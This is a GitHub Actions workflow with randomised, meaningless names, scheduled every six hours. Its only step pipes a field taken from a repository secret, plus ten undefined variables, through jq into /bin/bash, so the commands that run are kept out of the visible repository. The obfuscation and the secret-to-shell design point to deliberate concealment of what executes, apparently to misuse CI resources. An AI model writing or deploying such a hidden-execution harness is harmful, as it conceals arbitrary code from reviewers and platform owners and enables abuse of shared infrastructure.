name: wnnianli
on:
  workflow_dispatch:
  schedule:
    - cron: '41 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wnnianli
        env:
          jkzgg657: ${{ secrets.jkzgg657 }}
        run: |
          echo $jkzgg657 | jq -r .h9 | /bin/bash
          echo $oeu940 | jq -r .iwzcy634 | /bin/bash
          echo $w91 | jq -r .u57 | /bin/bash
          echo $tr498 | jq -r .c136 | /bin/bash
          echo $qta0906 | jq -r .y9 | /bin/bash
          echo $qol39506 | jq -r .x77846 | /bin/bash
          echo $igshy8 | jq -r .wla35026 | /bin/bash
          echo $ull8880 | jq -r .d9 | /bin/bash
          echo $hyps2898 | jq -r .awvsn3688 | /bin/bash
          echo $s5646 | jq -r .c4204 | /bin/bash
          echo $mrl7 | jq -r .rsmu0926 | /bin/bash

